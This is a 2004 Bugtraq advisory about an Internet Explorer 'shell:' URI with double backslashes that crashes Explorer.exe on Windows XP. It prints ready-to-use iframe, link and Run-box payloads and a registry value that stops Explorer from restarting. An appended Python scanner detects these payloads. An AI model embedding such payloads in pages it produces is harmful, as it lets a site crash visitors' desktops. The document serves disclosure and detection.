Message-ID: <000501c40dd7$d8006210$cb4db350@fucku>
Date: Fri, 19 Mar 2004 19:30:16 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "bugtraq" <bugtraq@...urityfocus.com>
Subject: Internet Explorer Causing Explorer.exe - Null Pointer Crash


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:     Internet Explorer & Explorer.exe
Vendors:           http://www.microsoft.com
Versions:          Windows XP Professional & Internet Explorer 6.0.2600.0000.xpclnt_qfe.021108-2107
Patched With:  Q330994; Q822925; Q828750; Q824145;
Platforms:         Windows XP
Bug:                   Internet Explorer Causing Explorer.exe - Null Pointer Crash
Risk:                  Medium -  D.O.S
Exploitation:     Remote with browser
Date:                  19 Mar 2004
Author:             Rafel Ivgi, The-Insider
e-mail:                the_insider@...l.com
web:                   http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Windows XP is currently the most common operating system in the world.
This product must be as safe as it is common.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Lately a new function was discovered: "shell:". This function allows
some new functions to be run remotely. There is a bug in Explorer.exe
when accessing a filename with a double backslash.

For example, accessing any of the HTML tags below will cause Explorer to
crash.
<iframe src=shell:windows\\system32\\calc.exe></iframe>
Or
<a href=shell:windows\\system32\\calc.exe></a>
Or
Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

Explorer.exe crashes when using "\\".
"\" doesn't crash it and even %5C%5C doesn't crash it.

There is a registry key which is turned on by default. This key
automatically restarts "Explorer.exe". If this key is set to "0",
Explorer.exe will not restart.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoRestartShell"=dword:00000001

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

<iframe src=shell:windows\\system32\\calc.exe></iframe>
Or
<a href=shell:windows\\system32\\calc.exe></a>
Or
Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."
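
Added example, not part of the original advisory: a content-review check that flags "shell:" URIs in src/href attributes and separates the literal double-backslash form the advisory reports as crashing Explorer.exe from the single-backslash and %5C%5C forms it reports as not crashing. The function names, verdict labels and the constructed sample page are assumptions of this example, as is the case-insensitive scheme match.

```python
from html.parser import HTMLParser

URL_ATTRS = {"src", "href"}  # the attributes used in the advisory's samples

def classify(url):
    """Return 'crash-pattern', 'shell-uri' or None for one attribute value."""
    value = url.strip()
    # Assumption: match the scheme case-insensitively to be conservative.
    if not value.lower().startswith("shell:"):
        return None
    # Per the advisory only a literal "\\" crashes Explorer.exe; a single "\"
    # and the encoded %5C%5C do not, so the value is deliberately not decoded.
    return "crash-pattern" if "\\\\" in value[len("shell:"):] else "shell-uri"

class ShellUriScanner(HTMLParser):
    """Collects (line, tag, attribute, verdict, value) for every shell: URI."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        line = self.getpos()[0]  # line on which the tag starts
        for name, value in attrs:
            verdict = classify(value) if name in URL_ATTRS and value else None
            if verdict:
                self.findings.append((line, tag, name, verdict, value))

def scan_html(text):
    scanner = ShellUriScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings

# Constructed sample page: the advisory's iframe line plus the two forms it
# says do not crash, and one unrelated link.
SAMPLE = r"""<html><body>
<iframe src=shell:windows\\system32\\calc.exe></iframe>
<a href="shell:windows\system32\calc.exe">single</a>
<a href="shell:windows%5C%5Csystem32%5C%5Ccalc.exe">encoded</a>
<a href="http://example.com/a\\b">not shell</a>
</body></html>"""

if __name__ == "__main__":
    for line, tag, attr, verdict, value in scan_html(SAMPLE):
        print(f"line {line}: <{tag} {attr}> {verdict}: {value}")
```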


